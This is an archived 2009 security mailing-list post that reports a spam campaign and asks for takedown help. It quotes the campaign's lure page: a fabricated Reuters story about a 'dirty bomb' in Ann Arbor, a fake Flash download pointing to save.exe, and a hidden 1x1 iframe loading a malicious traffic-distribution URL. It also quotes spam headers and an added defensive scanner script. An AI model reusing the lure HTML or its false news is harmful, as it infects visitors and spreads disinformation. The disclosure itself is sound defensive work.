[nsp-sec] chatloveonline.com & breakinggoodnews.com & breakingfreemichigan.com

William Allen Simpson william.allen.simpson at gmail.com
Tue Mar 17 09:09:30 EDT 2009


The good news is that Gmail is now flagging these messages as spam.

The bad news is that the number of domains and servers is expanding.  A
common element still seems to be the chatloveonline.com iframe, so I've
swapped the subject line.  But that could easily change.

Today's was yug.breakingfreemichigan.com, running with 6 nameservers at
ns[1-6].yug.breakingfreemichigan.com.

That's a little scarier, as they've managed to identify the victim's state
of residence before the spam, and then geolocate the city from the IP used.
Note that this is dynamic, correctly identifying Madison Heights yesterday,
and Ann Arbor today.

The whois for chatloveonline.com registration seems to be garbage data, yet
recently updated.  All 3 so far are registered with ename.com.

CHATLOVEONLINE.COM
    Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA ENAME CORP
    Whois Server: whois.ename.com
    Referral URL: http://www.ename.com
    Name Server: NS1.EXTENDEDMAN.COM
    Name Server: NS2.EXTENDEDMAN.COM
    Name Server: NS3.EXTENDEDMAN.COM
    Name Server: NS4.EXTENDEDMAN.COM
    Name Server: NS5.EXTENDEDMAN.COM
    Name Server: NS6.EXTENDEDMAN.COM
    Status: clientDeleteProhibited
    Status: clientTransferProhibited
    Updated Date: 09-mar-2009
    Creation Date: 04-feb-2009
    Expiration Date: 04-feb-2010

Registrant Contact Information :
YANSHIYING
YANSHIYING
yanshi_ying at yeah.net
FUNANLU19, 200159

Anybody able to get these (and any related) taken down?

===

Presumably owned machines acting as servers this morning:


===

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<TITLE>Reuters-United States: Terror attack in Ann Arbor</TITLE>
<META NAME="description" CONTENT="Reuters.com brings you the latest news from around the world, covering breaking news in business, finance, politics, entertainment, and more in video and pictures."></meta>
</head>
<body>
<table width="413" align="center" border="0">
<tr><td><img border="0" src="reu.gif"></td></tr>
<tr><td><b>Powerful explosion burst in Ann Arbor this morning.</b><br>
<br>
At least 12 people have been killed and more than 40 wounded in a bomb blast near market in Ann Arbor.
Authorities suggested that explosion was caused by "dirty" bomb. Police said the bomb was detonated from close by using electric cables.
"It was awful" said the eyewitness about blast that he heard from his shop. "It made the floor shake. So many people were running"<br>
Until now there has been no claim of responsibility.<br><br>

<a href="save.exe"><img border="0" src="vid.gif" alt="You need the latest Flash player to view video content. Click here to download."></a><br>
You need the latest Flash player to view video content. <a href="save.exe">Click here</a> to download.<br>
<br>
<br>
Related Links:<br>
<a href="http://en.wikipedia.org/wiki/Dirty_bomb">http://en.wikipedia.org/wiki/Dirty_bomb</a><br>
<a href="http://www.google.com/search?q=Ann Arbor+terror+attack">http://www.google.com/search?q=Ann Arbor+terror+attack</a><br>
</td></tr>
</table>
<iframe src="http://chatloveonline.com/tds/Sah7" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

</body>
</html>

===

Return-Path: <>
Received: from wergvan ([87.226.228.26])
         by mx.google.com with SMTP id 18si10231257gxk.53.2009.03.16.22.01.47;
         Mon, 16 Mar 2009 22:01:51 -0700 (PDT)
Received-SPF: neutral (google.com: 87.226.228.26 is neither permitted nor denied by domain of wergvan) client-ip=87.226.228.26;
Authentication-Results: mx.google.com; spf=neutral (google.com: 87.226.228.26 is neither permitted nor denied by domain of wergvan) smtp.mail=
Received: from rpw ([237.49.168.72]) by wergvan with Microsoft SMTPSVC(6.0.3790.211); Tue, 17 Mar 2009 13:32:42 +0900
Message-ID: <002801c9a6b9$698cde50$ed31a848 at BUHGALTERrpw>
From: "Mag" <ruethema.livingston at sc.com>
To: <william.allen.simpson at gmail.com>
Subject: Are you in good health?
Date: Tue, 17 Mar 2009 13:24:54 +0900
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="windows-1250";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

I hope you are in good health http://yug.breakingfreemichigan.com/run.php
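Two defender-side checks for the artifacts quoted in this post, written here as an added example (not code from the original message): a scanner for the lure HTML's hidden 1x1 iframe and .exe download links, and a parser that flags a Received: hop whose client address cannot be a real SMTP peer (237.49.168.72 in the quoted headers lies in multicast space, 224.0.0.0/4). The sample inputs are abbreviated copies of the HTML and headers shown above; function and variable names are my own.

```python
"""Checks for the two artifacts quoted above: the lure's hidden 1x1 iframe and
.exe links, and a Received: hop whose client IP cannot be a real SMTP peer."""
import ipaddress
import re
from html.parser import HTMLParser
EXEC_EXT = re.compile(r"\.(exe|scr|pif|com|bat|cmd)(\?.*)?$", re.I)
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
RECEIVED_IP = re.compile(r"^Received:\s*from\s+\S+\s+\(\[?(\d{1,3}(?:\.\d{1,3}){3})\]?\)", re.I | re.M)

class LureScanner(HTMLParser):
    """Collect (kind, detail) findings while parsing the lure page."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            if tiny or HIDDEN_CSS.search(a.get("style", "")):
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "a" and EXEC_EXT.search(a.get("href", "")):
            self.findings.append(("exe_link", a["href"]))

def scan_lure(html):
    p = LureScanner()
    p.feed(html)
    return p.findings

def bogus_received_hops(headers):
    """Client IPs from Received: lines that are multicast, reserved, loopback
    or unparseable; 237.49.168.72 in the quoted mail is multicast space."""
    bad = []
    for ip in RECEIVED_IP.findall(headers):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:  # e.g. an octet above 255
            bad.append(ip)
            continue
        if addr.is_multicast or addr.is_reserved or addr.is_loopback:
            bad.append(ip)
    return bad

# Abbreviated copies of the lure and the headers quoted in the post (sample input).
SAMPLE_HTML = """<html><body><a href="save.exe"><img src="vid.gif"></a>
<a href="http://en.wikipedia.org/wiki/Dirty_bomb">wiki</a>
<iframe src="http://chatloveonline.com/tds/Sah7" width="1" height="1"
 style="visibility:hidden;position:absolute"></iframe></body></html>"""
SAMPLE_HEADERS = ("Received: from wergvan ([87.226.228.26])\n"
                  "Received: from rpw ([237.49.168.72]) by wergvan with Microsoft SMTPSVC\n")
```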
